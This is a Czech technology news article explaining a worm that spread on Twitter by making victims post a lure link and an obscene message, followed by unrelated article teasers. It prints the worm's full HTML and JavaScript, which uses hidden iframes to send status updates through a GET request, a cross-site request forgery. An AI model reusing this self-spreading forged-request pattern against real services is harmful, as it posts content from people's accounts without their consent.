Další exploit: kozy zaútočily na Twitter

Další exploit: kozy zaútočily na Twitter

Pár dní po prvním „útoku“ na Twitter zažila oblíbená sociální síť další. Tentokrát nebyl tak sofistikovaný a spíše než potenciální chyby v samotném Twitteru využíval prostých vlastností jazyka HTML a DOM API.

Možná jste si všimli, že vaši přátelé znenadání začali psát zprávičky s tímto obsahem:

„I love anal sex with goats“

Pro neznalé angličtiny:

„Mám rád anální sex s kozami“

Ještě předtím se ovšem na jejich profilu objevil tento tweet:

„WTF: http://t.co/smbuvNd

Každý, kdo na takový odkaz klepnul, se přesunul na zdánlivě prázdnou stránku, ve skutečnosti se na ní ale zpracoval Javascript. Ten vytvořil neviditelný prvek IFRAME (vložená cizí stránka uvnitř další stránky) a v tomto rámci načetl adresu http://twitter.com/share/update?status=. Jakýkoliv text za rovnítkem se pak pomocí HTTP GET metody poslal přímo na Twitter jako zcela běžná zprávička.

Klepněte pro větší obrázek
A takto se choval twitterový červ v praxi

Kód celkem vytvořil dva prvky IFRAME. V tom prvním se nejprve odeslal odkaz s „WTF“, abyste nalákali další potenciální oběti, v tom druhém pak informace o vaší sexuální preferenci.

Celý kód, který se zpracoval na záškodnické stránce:

<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "
http://twitter.com/share/update?status=WTF: " + window.location;
el2.src = "
http://twitter.com/share/update?status=I love anal sex with goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>

Tento případ nezneužíval nějaké podstatnější chyby v Twitteru – pouze té vlastnosti, že Twitter uměl poslat zprávičku i přes HTTP GET požadavek. Jak se zdá, nyní to už není možné, pokud totiž GET požadavek upravíte a v prohlížeči navštívíte celou adresu, Twitter ohlásí neexistujícího uživatele share. Ani tentokrát nezpůsobil „virus“ nic vážného, pouze na pár jedinců (netušíme kolik) prozradil, co neměl.

Témata článku: Technologie, Web, Sociální sítě, Bezpečnost, Twitter, První útok, Status, Hidden, Head, Celý kód, Love

Určitě si přečtěte

Tesla chce změnit nákladní dopravu. Její elektrický náklaďák má ohromující parametry

Tesla chce změnit nákladní dopravu. Její elektrický náklaďák má ohromující parametry

** Tesla představila elektrický kamion ** Má obdivuhodný výkon i dojezd ** Prodávat by se měl už za dva roky

17.  11.  2017 | Vojtěch Malý | 200

Elektronika, která nepotřebuje kabel ani baterii. Živí se rádiovým šumem

Elektronika, která nepotřebuje kabel ani baterii. Živí se rádiovým šumem

** Každá elektrická krabička má konektor pro napájení nebo baterii ** Jenže pozor, jednou by to tak nemuselo být ** Drobná elektronika se může živit rádiovými vlnami

14.  11.  2017 | Jakub Čížek | 15

Nejlepší notebooky do 10 tisíc, které si teď můžete koupit

Nejlepší notebooky do 10 tisíc, které si teď můžete koupit

** I pod hranicí desíti tisíc korun existují dobře použitelné notebooky ** Mohou plnit roli pracovního stroje i zařízení pro zábavu ** Nejlevnější použitelný notebook koupíte za pět a půl tisíce

16.  11.  2017 | Stanislav Janů | 53


Aktuální číslo časopisu Computer

Otestovali jsme 5 HDR 4K televizorů

Jak natáčet video zrcadlovkou

Vytvořte si chytrou domácnost

Radíme s koupí počítačového zdroje